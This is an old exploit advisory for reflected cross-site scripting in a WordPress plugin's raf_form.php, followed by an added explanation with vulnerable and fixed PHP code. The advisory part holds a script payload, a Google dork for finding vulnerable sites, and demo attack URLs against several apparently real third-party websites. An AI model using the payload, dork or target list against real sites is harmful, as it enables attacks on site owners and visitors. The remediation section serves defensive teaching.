WordPress Recommend Cross Site Scripting
Posted on 26 December 2013
####################
# Exploit Title : WordPress Recommend to a friend plugin Cross site scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org/plugins/recommend-a-friend/
# Software Link : http://downloads.wordpress.org/plugin/recommend-a-friend.2.0.2.zip
# Google Dork : inurl:wp-content/plugins/recommend-a-friend/inc
# Date: 2013-12-23
# Tested on: Windows 7
# Discovered by : ACC3SS
------------------------------------------------
#
# Exploit : Cross site scripting
#
# Location : localhost/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url=[xss]
#
# Method : GET
#
# Script For Test : "/><script>alert(1);</script>
#
------------------------------------------------
#
# Demo:
#
# http://acpbusinessclimate.org/wordpress/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url= "/><script>alert(1);</script>
#
# http://chessmaniac.com/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url= "/><script>alert(1);</script>
#
# http://foolsforforests.org/wordpress/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url= "/><script>alert(1);</script>
#
# http://thepsychicsline.com/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url= "/><script>alert(1);</script>
#
# http://yesmaine.org/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url= "/><script>alert(1);</script>
#
######################

Thanks.

--
Best Regards,
Ashiyane Digital Security Team
http://ashiyane.org/forums
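The advisory reports that raf_form.php reflects the GET parameter current_url into the page without encoding, and the test string shows that the value lands inside a double-quoted HTML attribute (the leading `"/>` closes it). The following is an added illustration, not the plugin's own source: a minimal reconstruction of that pattern beside a hardened version. The function names, the hidden-field markup and the fallback-to-site-root behaviour are assumptions; htmlspecialchars() and parse_url() are standard PHP.

```php
<?php
// Added example, not code from the recommend-a-friend plugin.
// Reconstructs the reported defect (a query parameter concatenated into an
// HTML attribute) and shows the contextual-encoding fix. Function names are
// hypothetical.

// Vulnerable pattern: the raw request value is concatenated into a
// double-quoted attribute. The advisory's test string "/><script>alert(1);</script>
// closes the attribute and the tag, so the injected script element becomes
// part of the rendered page.
function render_hidden_field_vulnerable(string $current_url): string
{
    return '<input type="hidden" name="current_url" value="' . $current_url . '" />';
}

// Hardened pattern: accept only absolute http(s) URLs, fall back to a safe
// default otherwise, and encode for the attribute context at the point of
// output. In WordPress the equivalent helpers are esc_url_raw() for the
// validation step and esc_attr() for the output step.
function render_hidden_field_hardened(string $current_url, string $fallback = '/'): string
{
    $parts = parse_url($current_url);
    $scheme = (is_array($parts) && isset($parts['scheme'])) ? strtolower($parts['scheme']) : '';
    $host = (is_array($parts) && isset($parts['host'])) ? $parts['host'] : '';
    if ($parts === false || !in_array($scheme, ['http', 'https'], true) || $host === '') {
        // Not an absolute http(s) URL: do not reflect it, use the fallback.
        $current_url = $fallback;
    }
    // ENT_QUOTES encodes both " and ' so the value cannot terminate the attribute;
    // < and > are always encoded, so no new tag can be opened.
    $safe = htmlspecialchars($current_url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="hidden" name="current_url" value="' . $safe . '" />';
}

// Demo using the advisory's test string as a constructed request value.
$payload = '"/><script>alert(1);</script>';
echo "vulnerable: " . render_hidden_field_vulnerable($payload) . PHP_EOL;
echo "hardened:   " . render_hidden_field_hardened($payload) . PHP_EOL;
// A legitimate value passes validation and is still attribute-encoded.
echo "hardened:   " . render_hidden_field_hardened('https://example.com/post/1?a=1&b=2') . PHP_EOL;
```

Run it with `php` on the command line: the vulnerable line emits a closed input tag followed by a live script element, while the hardened line emits only the fallback value, and the legitimate URL comes out with its `&` encoded as `&amp;`, which the browser decodes back when the form is submitted. The validation step is the part a pure encoding fix misses: even a correctly encoded attacker-controlled URL is still an open redirect target if the form later sends the user to it, so restricting the scheme and host matters as much as the escaping.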
